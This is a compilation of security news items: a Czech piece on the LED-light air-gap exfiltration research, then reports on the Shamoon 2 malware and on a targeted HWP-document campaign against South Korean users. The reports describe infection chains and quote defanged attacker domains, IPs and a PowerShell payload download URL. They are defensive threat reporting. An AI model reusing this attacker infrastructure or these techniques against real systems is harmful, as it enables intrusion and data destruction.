Nejnovější metoda k hacknutí využívá blikání LED diody hard disku aktivní v okamžicích, kdy na disku probíhá čtení nebo zápis dat. Výzkumníci zjistili, že za pomocí malwaru mohou diodu kontrolovat tak, aby blikáním vysílala binární signály, což podle nich stačí k přenosu až 4000 bitů za sekundu, zkrátka dost na to, aby z počítače získali hesla či šifrovací klíče bez toho, aby vzbudili jakékoliv podezření.
„Diody na disku blikají s takovou frekvencí, že si nikdo nemůže všimnout čehokoliv divného,“ uvedl vedoucí výzkumného týmu Mordechai Guri.
K přečtení vysílaného signálu pak je třeba už jen kamera nebo optický senzor, přičemž Izraelci tvrdí, že ho dokážou přijímat až ze vzdálenosti dvaceti metrů, klidně i zpoza oken budovy. S čočkami s náležitým zoomem pak tato vzdálenost může být ještě větší.
Uplatnit tento hack v praxi by však nejspíš nebylo snadné, vývojářům totiž zatím chybí to podstatné – malware, kterým by LED diodu ovládali, a hlavně by vždy tento malware do vytipovaného počítače potřebovali nějak dostat, což vzhledem k obvyklým důkladným ochranným opatřením u air gap systémů, bude klíčovým problémem. Výzkumníci zároveň férově zmínili jednoduché řešení, jak podobnému hacku předcházet. Diodu stačí přelepit páskou...
Shamoon 2 malware, ASERT has shed light on the C2 and the infection process
26.2.2017 securityaffairs Virus
The analysis conducted by Arbor Networks on the Shamoon 2 malware has shed light on the control infrastructure and the infection process.
Security researchers from Arbor Networks’ Security Engineering and Response Team (ASERT) have conducted a new analysis of the Shamoon 2 malware discovering further details on the tools and techniques used by the threat actor.
The Shamoon 2 malware was first spotted in November 2016, a second variant of the same threat was discovered by researchers at Palo Alto Networks in January and it was able to target virtualization products.
Shamoon, also known as Disttrack, was first discovered in a wave of attacks that targeted companies in Saudi Arabia in 2012. Among the victims, there was the petrol giant Saudi Aramco. The principal capability of Shamoon is a feature that allows it to wipe data from hard drives of the infected systems.
In the attack against Saudi Aramco Shamoon wipe data on over 30,000 computers and rewrite the hard drive MBR (Master Boot Record) with an image of a burning US flag.
The last variant of the Shamoon2 malware infected computers at petrochemical targets and at the Saudi Arabian central bank system.
The analysis has shed light on the control infrastructure and the infection process.
The researchers at Arbor Networks started their analysis from the findings of the study conducted by IBM’s X-Force. The experts at IBM’s X-Force discovered the threat actor used weaponized documents containing a malicious macro that once executed enabled the connection to the C&C server via PowerShell commands.
The analysis of three X-Force malware samples, the researchers were able to locate the malicious domains and IP addresses used by the attackers.
“From the previous samples, we performed a passive DNS lookup on the IPs. We found get.adobe.go-microstf[.]com hosted at 104.218.120[.]128 around the time this campaign was ongoing, November 2016.” reads the analysis from ArborNetworks.
“Researching the domain go-microstf[.]com, hosted at 45.63.10[.]99, revealed yet another iteration of malicious executables. In this case, a URL used to download the PowerShell component shared a naming convention found in the IBM report, http://69.87.223[.]26:8080/eiloShaegae1 and connected to the IP address used by the previous three samples.”
The domain go-microstf[.]com was initially set up to harvest Google Analytics login page in a spoof campaign started in January.
The researchers linked the Shamoon 2 malware to Middle Eastern state-sponsored groups such as Magic Hound and PupyRAT.
One of the samples shared by IBM indicated the document author was ‘gerry.knight,’ then the experts at ASERT used this information to discover other three additional samples of documents used to distribute malicious macros unrelated to the Shamoon2 campaigns. Those samples matched existing documents used by threat actors behind the Magic Hound campaigns.
Another evidence that links Shammon 2 malware to Iranian hackers was a “sloo.exe” file dumped by the malicious code in a targeted PC’s Temp folder.
“Unlike newer samples, this one created a unique file ‘sloo.exe’. The file was created at C:\Documents and Settings\Admin\Local Settings\Temp\sloo.exe. In addition to this file, the sample also contacted 104.238.184[.]252 for the PowerShell executable.” reads the technical analysis published by Arbor Networks.
Targeted Malware Campaign Uses HWP Documents
25.2.2017 securityweek Virus
A recently observed targeted malware campaign against South Korean users was using Hangul Word Processor (HWP) documents as the infection vector, Talos researchers reveal.
Active between November 2016 and January 2017, the campaign was targeting a limited number of people using the Hancom-developed alternative to Microsoft Office, mainly because of its popularity among South Korean users. The malicious documents were written in Korean, allegedly written by the Korean Ministry of Unification.
For an increased sense of legitimacy, the documents attempted to download a file from an official Korean government website: kgls.or.kr (Korean Government Legal Service). The file in question was a binary masquerading as a jpeg file, which was meant to be executed as part of the infection.
Talos researchers suspect the website was compromised specifically to legitimize the attack. They also suggest that a sophisticated actor was behind the campaign, because compromised sites were cleaned or removed after the attack and the final payload was nowhere to be found. Further, the attackers didn’t use the same infrastructure for more than a few days and never returned to used infrastructure.
“Due to these elements it's likely that this loader has been designed by a well-funded group in order to target public sector entities in South Korea. Many of these techniques fit the profile of campaigns previously associated with attacks by certain government groups,” Talos says.
While uncommon, the use of HWP files for infection makes sense in the context, as the software is widely used within Korea, including by the South Korean government. Furthermore, because this is a regional file format, security devices might not be equipped to process HWP files, providing the attacker with a vector less likely to be detected.
Titled “Analysis of ‘Northern New Year’ in 2017,” the document includes the logo of the Ministry Of Unification, which is working towards the reunification of North & South Korea. The document features details about the North Korean celebration of New Year and includes two links to additional documents at the end, informing users they should double click the links to access these documents.
After opening the decoy document, the binaries execute wscript.exe and inject shellcode into the process. The shellcode, embedded in a resource called 'BIN', unpacks a second PE32 in the legitimate wscript.exe process and executes it.
This information might have been used for reconnaissance, to determine if the final payload was to be sent or not. The analyzed sample attempted to connect to an index.php file first, and then to a .jpg file, which might have been automatically generated by the index.php file based on the collected data. The content of the jpg file is saved as 'officepatch.exe' and executed.
Because the infrastructure was down during analysis, the security researchers couldn’t analyze the payload directly. However, they were able to find four C&C servers used by the actor, three located in South Korea and a fourth in the Netherlands. The actors used a MalDoc with multiple droppers for infection and C&C communication to obtain the final payload, along with decoy documents, which reveals that they wanted to use a social engineering / enticement aspect in the attack.
“This campaign has clearly targeted at a specific group of users, this rings true with the use of such specific file formats. Steps were clearly taken to limit the ability of security products to detect the threat as well as adherence to a strict timeline to prevent the malicious files from being discovered. The attackers were careful to remove their malicious payloads and not re-use their infrastructure,” Talos says. The attackers are believed to have attempted “to gain a foothold into assets which can be deemed extremely valuable.”
Responding to a SecurityWeek inquiry via email, a Talos representative said they couldn’t attribute the attacks to a specific actor: “The attackers had access to native Korean speakers and have a high degree of sophistication. However, any conjecture about what specific group or nation state might be behind the attack is pure speculation as the patterns are consistent with a few groups”.
